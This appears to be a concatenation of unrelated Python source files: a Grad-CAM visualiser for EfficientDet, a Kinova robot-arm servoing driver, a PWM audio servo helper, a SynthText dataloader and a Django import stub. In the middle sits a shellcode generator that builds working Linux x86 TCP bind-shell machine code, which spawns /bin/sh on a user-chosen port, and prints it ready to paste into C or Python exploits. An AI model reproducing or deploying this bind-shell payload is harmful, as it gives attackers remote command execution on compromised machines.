import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
# Display
import matplotlib.cm as cm
from model_modified import efficientdet_mod
from model import efficientdet
from utils import preprocess_image
def parse_args(args):
    """Parse command-line arguments for the Grad-CAM visualization script.

    Args:
        args: List of argument strings (e.g. ``sys.argv[1:]``).

    Returns:
        argparse.Namespace with model_path, phi, viz_cls and img_path.
    """
    parser = argparse.ArgumentParser(description='Gradcam visualization script for Efficientdet.')
    parser.add_argument('--model_path', help='Path to trained model.', default='efficientdet-d1.h5')
    parser.add_argument('--phi', help='Hyper parameter phi', default=1, type=int, choices=(0, 1, 2, 3, 4, 5, 6))
    parser.add_argument('--viz_cls', help='coco class to visualize', type=int, default=0)
    parser.add_argument('--img_path', help='image to visualize', default='sample\\person.jpg')
    # Parse once and reuse the result: the original called parse_args twice
    # (once for the debug print, once for the return value).
    parsed = parser.parse_args(args)
    print(vars(parsed))
    return parsed
def main(args=None):
    """Grad-CAM visualization for EfficientDet; writes ``out.jpg``.

    Builds the modified EfficientDet (one sub-model per feature level that
    exposes the level's last conv output, plus a matching prediction head),
    computes a guided Grad-CAM heatmap for the requested class at every
    level, and tiles the source image together with the superimposed
    heatmaps into a 2x3 grid saved as ``out.jpg``.
    """
    # parse arguments
    if args is None:
        args = sys.argv[1:]
    args = parse_args(args)
    image_path = args.img_path
    top_pred_index = args.viz_cls  # class channel whose score is attributed
    model_path = args.model_path
    phi = args.phi
    weighted_bifpn = True
    # Input resolution per EfficientDet compound-scaling coefficient phi.
    image_sizes = (512, 640, 768, 896, 1024, 1280, 1408)
    image_size = image_sizes[phi]
    num_classes = 90
    score_threshold = 0.3
    #load modified efficientdet
    #get the last conv layer before inference and prediction models
    conv_layer_out,pred_models = efficientdet_mod(phi=phi,
                                                  weighted_bifpn=weighted_bifpn,
                                                  num_classes=num_classes,
                                                  score_threshold=score_threshold)
    num_layers = len(conv_layer_out)
    # Both halves of each split load their weights (matched by layer name)
    # from the same trained checkpoint.
    for i in range(num_layers):
        conv_layer_out[i].load_weights(model_path, by_name=True)
        pred_models[i].load_weights(model_path, by_name=True)
    image = cv2.imread(image_path)
    src_image = image.copy()
    # BGR -> RGB
    image = image[:, :, ::-1]
    h, w = image.shape[:2]
    image, scale = preprocess_image(image, image_size=image_size)
    #to be used for display
    img = keras.preprocessing.image.img_to_array(image)
    image = [np.expand_dims(image, axis=0)]
    #Create an combined image with all gradcams from different layers
    # NOTE(review): assumes the source image fits in one grid cell
    # (h <= 2*image_size and w <= 3*image_size) — confirm for large inputs.
    out_image = np.zeros((image_size*2,image_size*3,3), np.uint8)
    out_image[0:h,0:w,:] = src_image
    # Grid cursor: cell (0,0) holds the source image; heatmaps fill the other
    # cells left-to-right (display_col is incremented BEFORE placing).
    # NOTE(review): with num_layers > 5 cells get overwritten — verify.
    display_row = 0
    display_col = 0
    for i in range(0,num_layers):
        #relative position is merged display image
        display_col += 1
        if display_col == 3:
            display_row = 1
            display_col = 0
        with tf.GradientTape() as tape:
            last_conv_layer_output = conv_layer_out[i](image)
            preds = pred_models[i](last_conv_layer_output)
            top_class_channel = preds[:, :, top_pred_index]
        # use automatic differentiation to compute the gradients
        grads = tape.gradient(top_class_channel, last_conv_layer_output)
        # compute the guided gradients
        castConvOutputs = tf.math.abs(last_conv_layer_output)
        castGrads = tf.cast(grads > 0, "float32")
        guidedGrads = castConvOutputs * castGrads * grads
        # Drop the batch dimension for the single input image.
        convOutputs = last_conv_layer_output[0]
        guidedGrads = guidedGrads[0]
        # compute the average of the gradient values, and using them
        # as weights, compute the ponderation of the filters with
        # respect to the weights
        weights = tf.reduce_mean(guidedGrads, axis=(0, 1))
        cam = tf.reduce_sum(tf.multiply(weights, convOutputs), axis=-1)
        heatmap = cv2.resize(cam.numpy(), (image_sizes[phi], image_sizes[phi]))
        # normalize the heatmap such that all values lie in the range
        # [0, 1], scale the resulting values to the range [0, 255],
        # and then convert to an unsigned 8-bit integer
        eps = 0.000001  # avoids division by zero on a constant heatmap
        numer = heatmap - np.min(heatmap)
        denom = (heatmap.max() - heatmap.min()) + eps
        heatmap = numer / denom
        heatmap = (heatmap * 255).astype("uint8")
        # We use jet colormap to colorize heatmap
        jet = cm.get_cmap("jet")
        # We use RGB values of the colormap
        jet_colors = jet(np.arange(256))[:, :3]
        jet_heatmap = jet_colors[heatmap]
        # We create an image with RGB colorized heatmap
        jet_heatmap = keras.preprocessing.image.array_to_img(jet_heatmap)
        jet_heatmap = jet_heatmap.resize((image_sizes[phi], image_sizes[phi]))
        jet_heatmap = keras.preprocessing.image.img_to_array(jet_heatmap)
        #exchange b and r
        jet_heatmap = jet_heatmap[:, :, ::-1]
        # Superimpose the heatmap on original image
        superimposed_img = jet_heatmap * 0.3 + img
        superimposed_img = keras.preprocessing.image.array_to_img(superimposed_img)
        out_image[display_row*image_size:(display_row+1)*image_size,
                  display_col*image_size:(display_col+1)*image_size,:] = superimposed_img
    cv2.imwrite("out.jpg",out_image)


if __name__ == '__main__':
    main()
|
#!/usr/bin/env python3
from environments import SimulatorKinovaGripper, SimulatorKinovaGripperInverseJacobian, MultiPointReacher, FullDOFKinovaReacher, TwoJointPlanarKinova
from environments import TwoJointVisualPlanarKinova, FOURDOFKinovaReacher
import sys
# Drop ROS Kinetic's Python 2 dist-packages from the import path so that
# Python 3 packages (e.g. cv2) are not shadowed.
# BUG FIX: guarded the removal — sys.path.remove raises ValueError on
# machines where that path is not present.
_ROS_PY2_PATH = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if _ROS_PY2_PATH in sys.path:
    sys.path.remove(_ROS_PY2_PATH)
from visualservoing import PickPolicy, TwoDOFInverseJacobian
import time
import numpy as np
try:
    import rospy
except ImportError:
    # BUG FIX: narrowed the bare `except:` so only a missing rospy is
    # tolerated; other errors (including KeyboardInterrupt) propagate.
    print("no rospy")
#TODO figure out how to just run things in the module folders
#this is a work around for annoying error I was getting when I'd run things in the modules...
if __name__ == "__main__":
    # Manual smoke-test driver: builds a full-DOF Kinova reacher environment,
    # runs an inverse-Jacobian visual-servoing policy for 2000 steps, and
    # prints per-step rewards/observations. Alternative env/policy setups are
    # kept below, commented out, for quick experimentation.
    #env = SimulatorKinovaGripper(target_generation = 'kinematic')
    #env = SimulatorKinovaGripper(target_generation = 'fixed')
    #policy = InverseJacobian(gain= 1.0)
    #policy = MultiPointInverseJacobian(gain= 1.0)
    #policy = LocalLeastSquareUVS(gain=1.0, num_pts=4, pts_dim=3, min_experience=10000, k=50, solve_least_square_together=True)
    #policy = AmmortizedLocalLeastSquareUVS(gain=1.0, num_pts=4, pts_dim=3, min_experience=100000,capacity=100000, inputs=45, outputs=84)
    #policy = UncalibratedVisuoServoing(gain= 1.0, n_updates=10, use_broyden=False)
    rewards ='l2' #'l2,l1,precision,action-norm,discrete-time-penalty,keep-moving'
    print("hello world")
    # Joints 2/4/6 limited to +/-1.2, others unbounded — presumably radians;
    # TODO confirm units against FullDOFKinovaReacher.
    custom_bound = FullDOFKinovaReacher.generate_custom_bounds(symmetric_bound = [np.inf, 1.2, np.inf, 1.2, np.inf, 1.2, np.inf])
    print(custom_bound)
    env = FullDOFKinovaReacher(joint_bounds=custom_bound, target_bounds=custom_bound, H = 200, reward_type=rewards)
    #env = TwoJointPlanarKinova(H=200)
    #env = TwoJointVisualPlanarKinova(H=200, target_bounds = custom_bound)
    #env = FOURDOFKinovaReacher(H = 200, target_bounds = custom_bound,
    #                           joint_bounds = custom_bound, reward_type=rewards)
    #policy = PickPolicy("local-uvs", 0.5, 1, 2, 2)
    #policy = PickPolicy("broyden", 0.1, 1, 2, 2)
    policy = PickPolicy("inversejacobian", 0.5, num_pts= 1, pts_dim= 3, num_actuators=7)
    #policy = TwoDOFInverseJacobian(TwoJointPlanarKinova.L1, TwoJointPlanarKinova.L2, gain = 0.5)
    print("we created environment")
    #env = SimulatorKinovaGripper(dt=0.05, reward_type=rewards)
    #env = SimulatorKinovaGripperInverseJacobian(target_generation='fixed')
    #env = MultiPointReacher(dt=0.1)
    policy.learn(env)
    print('hello world of gym parameters')
    print("observation space", env.observation_space)
    print("action space", env.action_space)
    print("env type", type(env))
    i = 0
    print(env.kinova_listener.control_joints)
    # Visual variant records camera frames to a video file.
    if isinstance(env, TwoJointVisualPlanarKinova):
        env.publish_to_camera(capture_target=True, save_path='./video.avi')
    obs = env.reset()
    returns = 0.0
    #while True:
    # Run 2000 policy steps (episodes end via `done`, H=200 per episode).
    for i in range(100 * 20):
        env.render()
        #a = env.action_space.sample()
        a = policy.act(obs)
        #a = np.array([0, 0.0, 0, 0.0, 0.0, 0.1, 0.0])
        # Stop cleanly when ROS shuts down (e.g. Ctrl-C on the ROS side).
        if rospy.is_shutdown():
            break
        #act = env.action_space.sample()#np.ones((7, 3)) #np.random.randn(7)
        #J = policy.J
        #iJ = np.linalg.pinv(J)
        obs, rew, done, info = env.step(a)
        #print(obs[0:2], obs[8:10], 'position', 'target')
        print(rew, obs[0:3], obs[-3:], obs.shape)
        #print(obs)
        #print(rew)
        #print(done)
        #print(info)
        returns += rew
        if done:
            # Episode finished: report the return and reset env + policy state.
            print(returns)
            returns = 0.0
            obs = env.reset()
            policy.reset()
    env.close()
|
#!/usr/bin/env python3
# Python primary Helper to generate PWM audio signals to control a servos
# Current setup involves sending a mono audio PWM signal from the left (or right) channel to control a servo
# We use a USB soundcard/default audio jack to output audio waveform, but since it is usually 2V peak DC, we need an Op-Amp circuit to boost to ~5V
# Please check documentation for USB powered circuit powering servo and op amp circuit
# WAV files are favoured as signal sources as they are lossless as compared to MP3
# Sound player module fallback is ffmpeg, but for windows systems it is better to install PYAUDIO, since it does not need to access restricted folders to generate a temporary wav file for playing.
# To install pyaudio, some helper packages are needed first: libasound-dev portaudio19-dev libportaudio2 libportaudiocpp0 ffmpeg. Hopefully this means it plays the audio file created in situ before the entire Pulsegen class destructs after each audio command. Wholesome, organic, grass-fed audio solution...
# For playing saved .wav files, we should use python sounddevices to choose the output device first
# Made 2019, <NAME>
# mingsongwu [at] outlook [dot] sg
###
from ctypes import *
from contextlib import contextmanager
import time
from pydub import AudioSegment
from pydub.generators import SignalGenerator
# from pydub.playback import play
from extraFunctions import play
import os, sys
# Set to True to let ALSA print its error messages instead of silencing them.
SHOWERROR = False
## removing buggy/useless ALSA pyaudio errors. Does not affect audio output.
# C prototype of libasound's error handler:
#   void handler(const char *file, int line, const char *function,
#                int err, const char *fmt)
ERROR_HANDLER_FUNC = CFUNCTYPE(None, c_char_p, c_int, c_char_p, c_int, c_char_p)
def py_error_handler(filename, line, function, err, fmt):
    # No-op callback: swallows every ALSA error message.
    pass
# ctypes-wrapped callback suitable for snd_lib_error_set_handler().
c_error_handler = ERROR_HANDLER_FUNC(py_error_handler)
@contextmanager
def noALSAerror():
    """Suppress noisy (harmless) ALSA error output while audio plays.

    When SHOWERROR is False, stderr (fd 2) is redirected to /dev/null for the
    duration of the block; otherwise libasound's error handler is swapped for
    the no-op C callback and restored afterwards.
    """
    if not SHOWERROR:
        # stackoverflow.com/a/36966379
        devnull = os.open(os.devnull, os.O_WRONLY)
        old_stderr = os.dup(2)
        sys.stderr.flush()
        os.dup2(devnull, 2)
        os.close(devnull)
        try:
            yield
        finally:
            os.dup2(old_stderr, 2)
            os.close(old_stderr)
    else:
        asound = cdll.LoadLibrary('libasound.so')
        asound.snd_lib_error_set_handler(c_error_handler)
        # BUG FIX: restore the default handler even if the body raises
        # (the original leaked the no-op handler on exception).
        try:
            yield
        finally:
            asound.snd_lib_error_set_handler(None)
##
class Pulsegen(SignalGenerator):
    """PWM pulse-train generator for driving a servo over an audio channel.

    Extends pydub's SignalGenerator; ``generate`` yields one sample per call
    at ``self.sample_rate`` (presumably provided by the base class — confirm
    against pydub's SignalGenerator).
    """
    # Pan constants: -1 = 100% left channel, 1 = 100% right channel.
    PANLEFT = -1
    PANRIGHT = 1

    def __init__(self, duty, polarity = True, freq = 51, duration = 400, pan = -1, **kwargs):
        # duty: fraction of each cycle the pulse is high (0.0-1.0)
        # polarity: True yields positive pulses (+1.0), False negative (-1.0)
        # freq: PWM frequency in Hz (~50 Hz is typical for hobby servos)
        # duration: length of the rendered audio segment, in milliseconds
        # pan: stereo pan of the output; see PANLEFT / PANRIGHT
        super().__init__(**kwargs)
        self.freq = freq
        self.duty = duty
        self.polarity = polarity
        self.duration = duration
        ## pan function is volume equaliser: -1 = 100% left, 1 = 100% right
        self.pan = pan

    def generate(self):
        # Endless PWM sample stream: +/-1.0 during the pulse, 0 otherwise.
        sample_n = 0
        # in samples
        cycle_length = self.sample_rate / float(self.freq)
        pulse_length = cycle_length * self.duty
        while True:
            if (sample_n % cycle_length) < pulse_length:
                if self.polarity == True:
                    yield 1.0
                else:
                    yield -1.0
            else:
                yield 0
            sample_n += 1

    def playpulse(self):
        # Render `duration` ms of the pulse train, pan it, and play it with
        # ALSA error spam suppressed.
        sound_segment = self.to_audio_segment(self.duration)
        ## pan function is volume equaliser: -1 = 100% left, 1 = 100% right
        sound_segment = sound_segment.pan(self.pan)
        ## setting channels instead is possible, but using stereo output effectively sends mono signal through both channel contacts = stereo output
        #sound_segment = sound_segment.set_channels(1)
        with noALSAerror():
            play(sound_segment)

    def setPan(self, pan):
        # Update the stereo pan used by subsequent playpulse() calls.
        self.pan = pan

    def __enter__(self):
        # print('\nPulse generator initialising...done\n')
        return self

    def __exit__(self, e_type, e_val, traceback):
        # Nothing to release; context-manager support is purely cosmetic.
        # print('\nPulse generator self destructing...done')
        pass
|
# NOTE(review): Python 2 script (print statement / raw_input) — will not run
# under Python 3 without porting.
import os
os.system("clear")
os.system("cowsay ShellC0de - Tegal1337 | lolcat")
# Take users TCP port as input
port = raw_input("Enter TCP Port Number: ")
# Convert input string to an integer
deciPort = int(port)
# Format the integer to Hex Integer
hexPort = "{:02x}".format(deciPort)
#print "Hex value of Decimal Number:",hexPort
# Check the length of the output hex string
hexStrLen = len(hexPort)
# Check if the hex string is even or odd with modulus 2
oddEven = hexStrLen % 2
# if it returns 1 then it's odd. We need to add a leading 0
if oddEven == 1:
    hexPort = "0" + hexPort
# converts the port number into the correct hex format
# (pairs of hex digits joined by the literal text "\x", e.g. 4444 -> "11\x5c")
# NOTE(review): ports < 256 yield only one byte here, but the `push word`
# in the shellcode expects two — verify before using small port numbers.
tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2))
print "Your TCP Port in Hex is:","\\x"+tcpPort
# A port whose low byte is 0 would embed a NUL (0x00) in the shellcode,
# which would terminate the C string early — reject it.
nullCheck = deciPort % 256
if nullCheck == 0 :
    print "Your TCP Port contains a Null 0x00."
    print "Try again with a different Port Number."
    exit(0)
# Linux x86 (32-bit) TCP bind-shell shellcode, assembled by hand as escaped
# byte strings. scPart1 ends just before the 2-byte port immediate; the
# user-supplied port is spliced in between scPart1 and scPart2 later.
# 1. Create a new Socket
# <socketcall> ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 = "\x31\xc0"  # xor eax, eax; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66"  # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb"  # xor ebx, ebx; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x01"  # mov bl, 0x1; EBX is set to create a socket
scPart1 += "\x31\xc9"  # xor ecx, ecx; This sets the ECX Register to NULL (all zeros).
scPart1 += "\x51"  # push ecx; ECX[2]. ECX is NULL
scPart1 += "\x53"  # push ebx; ECX[1]. EBX already has the value we need for ECX[1]
scPart1 += "\x6a\x02"  # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart1 += "\x89\xe1"  # mov ecx, esp ; ECX now holds the pointer to the arg array
scPart1 += "\xcd\x80"  # int 0x80 ; System Call Interrupt 0x80 - Executes socket().
scPart1 += "\x96"  # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI
# 2. Create TCP-IP Address and Bind the Address to the Socket
# struct sockaddr_in ipSocketAddr = {
#     .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY};
#                  ARG[0]               ARG[1]                          ARG[2]
#<socketcall> bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 += "\x31\xc0"  # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66"  # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb"  # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x02"  # mov bl, 0x2 ; EBX is set to create a socket
scPart1 += "\x31\xd2"  # xor edx, edx ; This sets the EDX Register to NULL (all zeros).
scPart1 += "\x52"  # push edx ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY.
scPart1 += "\x66\x68"  # push word 0x?? ; ; ARG[1]. This is for the TCP Port #
#tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11
# (the user-supplied port bytes are inserted between scPart1 and scPart2)
scPart2 = "\x66\x53"  # push bx ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart2 += "\x31\xc9"  # xor ecx, ecx ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x89\xe1"  # mov ecx, esp ; Save the memory location of ARG[0] into the EDX Register.
scPart2 += "\x6a\x10"  # push 0x10 ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
scPart2 += "\x51"  # push ecx ; ECX[1]. The pointer to the beginning of the struct we saved
scPart2 += "\x56"  # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1"  # mov ecx, esp ; Now we need to point ECX to the top of the loaded stack.
scPart2 += "\xcd\x80"  # int 0x80 ; System Call Interrupt 0x80
# 4. Listen for incoming connections on TCP-IP Socket.
# <socketcall> listen( ipv4Socket, 0 );
# EAX=0x66 EBX ECX[0] ECX[1]
scPart2 += "\x31\xc0"  # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66"  # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb"  # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x04"  # mov bl, 0x4 ; EBX is set to listen().
scPart2 += "\x31\xc9"  # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51"  # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56"  # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1"  # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80"  # int 0x80 ; Executes listen(). Allowing us to handle incoming TCP-IP Connections.
# 5. Accept the incoming connection, and create a connected session.
# <socketcall> clientSocket = accept( ipv4Socket, NULL, NULL );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart2 += "\x31\xc0"  # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66"  # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb"  # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x05"  # mov bl, 0x5 ; EBX is set to accept().
scPart2 += "\x31\xc9"  # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51"  # push ecx ; ECX[2]. Push the value 0x0 to the stack.
scPart2 += "\x51"  # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56"  # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1"  # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80"  # int 0x80 ; System Call Interrupt 0x80
scPart2 += "\x93"  # xchg ebx, eax ; The created clientSocket is stored in EAX after receiving a connection.
# 6. Transfer STDIN, STDOUT, STDERR to the connected Socket.
# dup2( clientSocket, 0 ); // STDIN
# dup2( clientSocket, 1 ); // STDOUT
# dup2( clientSocket, 2 ); // STDERR
# EAX EBX ECX
scPart2 += "\x31\xc0"  # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x31\xc9"  # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\xb1\x02"  # mov cl, 0x2 ; This sets the loop counter, and
#                      ; will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
#dup2Loop:             ; Procedure label for the dup2 Loop.
scPart2 += "\xb0\x3f"  # mov al, 0x3f ; EAX is now 0x0000003F = SYSCALL 63 - dup2
scPart2 += "\xcd\x80"  # int 0x80 ; System Call Interrupt 0x80 - Executes accept().
#                      ; Allowing us to create connected Sockets.
scPart2 += "\x49"  # dec ecx ; Decrements ECX by 1
scPart2 += "\x79\xf9"  # jns dup2Loop /jns short -5 ; Jump back to the dup2Loop Procedure until ECX equals 0.
# 7. Spawn a "/bin/sh" shell for the client, in the connected session.
# execve("/bin//sh", NULL, NULL);
# EAX EBX ECX EDX
scPart2 += "\x52"  # push edx ; Push NULL to terminate the string.
scPart2 += "\x68\x2f\x2f\x73\x68"  # push 0x68732f2f ; "hs//" - Needs to be 4 bytes to fit on stack properly
scPart2 += "\x68\x2f\x62\x69\x6e"  # push 0x6e69622f ; "nib/" - This is "/bin//sh" backwards.
scPart2 += "\x89\xe3"  # mov ebx, esp ; point ebx to stack where /bin//sh +\x00 is located
scPart2 += "\x89\xd1"  # mov ecx, edx ; NULL
scPart2 += "\xb0\x0b"  # mov al, 0xb ; execve System Call Number - 11
scPart2 += "\xcd\x80"  # int 0x80 ; execute execve with system call interrupt
# Render the assembled shellcode bytes as printable "\xNN" escape text,
# with the user-chosen port spliced between the two fixed parts.
# Initiate the Shellcode variable we will output
shellcode = ""
# Add the first part of the tcp bind shellcode
# (bytearray() on a Python 2 str yields the raw byte values)
for x in bytearray(scPart1) :
    shellcode += '\\x'
    shellcode += '%02x' %x
# Add the user added tcp port to the shellcode
shellcode += "\\x"+tcpPort
# Add the second part of the tcp bind shellcode
for x in bytearray(scPart2) :
    shellcode += '\\x'
    shellcode += '%02x' %x
print "Choose your shellcode export format."
exportFormat = raw_input("[1] = Python\n[2] = C\n[99] = Help\nsenpai@tegalsec:~# ")
if exportFormat == "1" :
    # Wrap at 48 characters (12 bytes) per line, Python string-append style.
    formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
    print "[-----------------------Your-Shellcode------------------------]"
    print 'shellcode = "'+formatSC+'"'
elif exportFormat == "2" :
    # Wrap at 48 characters per line, C string-literal style.
    formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
    print "[----------------Your-Shellcode------------------]"
    print ' unsigned char shellcode[] = \\\n"'+formatSC+'";'
elif exportFormat == "99":
    print '''What Is Shellcode?
In the field of computer security [Wikipedia]
[ExploitDB] https://www.exploit-db.com/shellcodes
Code Using https://www.exploit-db.com/shellcodes/48032
'''
else:
    print "Your Brain Error!"
|
<filename>train_synth/dataloader.py<gh_stars>0
from torch.utils import data
import matplotlib.pyplot as plt
import numpy as np
import cv2
import os
import train_synth.config as config
from src.utils.data_manipulation import resize, normalize_mean_variance, generate_affinity, generate_target
"""
globally generating gaussian heatmap which will be warped for every character bbox
"""
class DataLoaderSYNTH(data.Dataset):
    """
    DataLoader for strong supervised training on Synth-Text
    """
    DEBUG = False  # Make this True if you want to do a run on small set of Synth-Text

    def __init__(self, type_):
        """Load SynthText annotations and split them into train/test.

        Args:
            type_: 'train' selects the first 90% of the images; any other
                value selects the remaining 10%.
        """
        self.type_ = type_
        self.base_path = config.DataLoaderSYNTH_base_path
        if DataLoaderSYNTH.DEBUG:
            # To check for small data sample of Synth
            if not os.path.exists('cache.pkl'):
                # Create cache of 1000 samples if it does not exist
                with open('cache.pkl', 'wb') as f:
                    import pickle
                    from scipy.io import loadmat
                    mat = loadmat(config.DataLoaderSYNTH_mat)
                    pickle.dump([mat['imnames'][0][0:1000], mat['charBB'][0][0:1000], mat['txt'][0][0:1000]], f)
                    print('Created the pickle file, rerun the program')
                exit(0)
            else:
                # Read the Cache
                with open('cache.pkl', 'rb') as f:
                    import pickle
                    self.imnames, self.charBB, self.txt = pickle.load(f)
                    print('Loaded DEBUG')
        else:
            from scipy.io import loadmat
            mat = loadmat(config.DataLoaderSYNTH_mat)  # Loads MATLAB .mat extension as a dictionary of numpy arrays
            # Read documentation of how synth-text dataset is stored to understand the processing at
            # http://www.robots.ox.ac.uk/~vgg/data/scenetext/readme.txt
            total_number = mat['imnames'][0].shape[0]
            train_images = int(total_number * 0.9)
            if self.type_ == 'train':
                self.imnames = mat['imnames'][0][0:train_images]
                self.charBB = mat['charBB'][0][0:train_images]  # number of images, 2, 4, num_character
                self.txt = mat['txt'][0][0:train_images]
            else:
                self.imnames = mat['imnames'][0][train_images:]
                self.charBB = mat['charBB'][0][train_images:]  # number of images, 2, 4, num_character
                self.txt = mat['txt'][0][train_images:]
        # Reorder each charBB entry from (2, 4, num_char) to a list of
        # per-character (4, 2) corner arrays.
        for i, x in enumerate(self.charBB):
            try:
                self.charBB[i] = list(np.array(x).squeeze().transpose(2, 1, 0))
            except ValueError:
                # BUG FIX (narrowed from a bare `except:`): with exactly one
                # character, squeeze drops the char axis leaving a 2-D array,
                # so transpose(2,1,0) raises ValueError; restore the axis.
                # NOTE(review): the fallback's axis order looks suspect
                # (it yields shape (4, 2, 1)) — confirm on single-char samples.
                self.charBB[i] = list(np.expand_dims(np.array(x).squeeze(), 0).transpose(2, 1, 0))
        txt_list = []
        for no, i in enumerate(self.txt):
            all_words = []
            for j in i:
                all_words += [k for k in ' '.join(j.split('\n')).split() if k != '']
                # Getting all words given paragraph like text in SynthText
            txt_list.append(all_words)
        self.txt = txt_list

    def __getitem__(self, item):
        """Return one training sample.

        Returns:
            Tuple of (image, weight_character, weight_affinity, normal_image):
            the normalized CHW float32 image, the character/affinity heatmap
            targets, and a uint8 copy with affinity boxes drawn for debugging.
        """
        item = item % len(self.imnames)
        #image = plt.imread(self.imnames[item]) # Read the image
        image = plt.imread(self.base_path+'/'+self.imnames[item][0])  # Read the image
        # Normalize to 3-channel RGB regardless of the source format.
        if len(image.shape) == 2:
            image = np.repeat(image[:, :, None], repeats=3, axis=2)
        elif image.shape[2] == 1:
            image = np.repeat(image, repeats=3, axis=2)
        else:
            image = image[:, :, 0: 3]
        image, character = resize(image, np.array(self.charBB[item].copy()))  # Resize the image to (768, 768)
        normal_image = image.astype(np.uint8).copy()
        image = normalize_mean_variance(image).transpose(2, 0, 1)
        # Generate character heatmap
        weight_character = generate_target(image.shape, character.copy())
        # Generate affinity heatmap
        weight_affinity, affinity_bbox = generate_affinity(image.shape, character.copy(), self.txt[item].copy())
        # Draw the affinity boxes (green) on the debug image.
        cv2.drawContours(
            normal_image,
            np.array(affinity_bbox).reshape([len(affinity_bbox), 4, 1, 2]).astype(np.int64), -1, (0, 255, 0), 2)
        # Also draw each affinity box enlarged by 60/25 about its center (red).
        enlarged_affinity_bbox = []
        for i in affinity_bbox:
            center = np.mean(i, axis=0)
            i = i - center[None, :]
            i = i*60/25
            i = i + center[None, :]
            enlarged_affinity_bbox.append(i)
        cv2.drawContours(
            normal_image,
            np.array(enlarged_affinity_bbox).reshape([len(affinity_bbox), 4, 1, 2]).astype(np.int64),
            -1, (0, 0, 255), 2
        )
        return \
            image.astype(np.float32), \
            weight_character.astype(np.float32), \
            weight_affinity.astype(np.float32), \
            normal_image

    def __len__(self):
        # Training "length" repeats the set num_epochs_strong_supervision
        # times so one DataLoader pass covers the full supervision schedule.
        if self.type_ == 'train':
            return int(len(self.imnames)*config.num_epochs_strong_supervision)
        else:
            return len(self.imnames)
class DataLoaderEval(data.Dataset):
    """
    DataLoader for evaluation on any custom folder given the path
    """
    def __init__(self, path):
        self.base_path = path
        # Deterministic ordering; only files ending in 'jpg' are picked up
        self.imnames = [x for x in sorted(os.listdir(self.base_path)) if x[-3:]=='jpg']
    def __getitem__(self, item):
        """Return (normalized 768x768 CHW image, file name, original (height, width))."""
        image = plt.imread(self.base_path+'/'+self.imnames[item])  # Read the image
        # Force a 3-channel image: grayscale is tiled, RGBA loses alpha.
        if len(image.shape) == 2:
            image = np.repeat(image[:, :, None], repeats=3, axis=2)
        elif image.shape[2] == 1:
            image = np.repeat(image, repeats=3, axis=2)
        else:
            image = image[:, :, 0: 3]
        # ------ Resize the image to (768, 768) ---------- #
        height, width, channel = image.shape
        max_side = max(height, width)
        # Scale so the longest side becomes 768, preserving aspect ratio
        new_resize = (int(width / max_side * 768), int(height / max_side * 768))
        image = cv2.resize(image, new_resize)
        # Pad to a 768x768 canvas filled with the image mean, centered
        big_image = np.ones([768, 768, 3], dtype=np.float32) * np.mean(image)
        big_image[
            (768 - image.shape[0]) // 2: (768 - image.shape[0]) // 2 + image.shape[0],
            (768 - image.shape[1]) // 2: (768 - image.shape[1]) // 2 + image.shape[1]] = image
        big_image = normalize_mean_variance(big_image)
        big_image = big_image.transpose(2, 0, 1)
        return big_image.astype(np.float32), self.imnames[item], np.array([height, width])
    def __len__(self):
        return len(self.imnames)
|
<gh_stars>0
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.http import Http404
from django.urls import reverse
from django.views.generic import UpdateView
from bakery.views import BuildableDetailView
from rest_framework import viewsets
from rest_framework.permissions import IsAdminUser
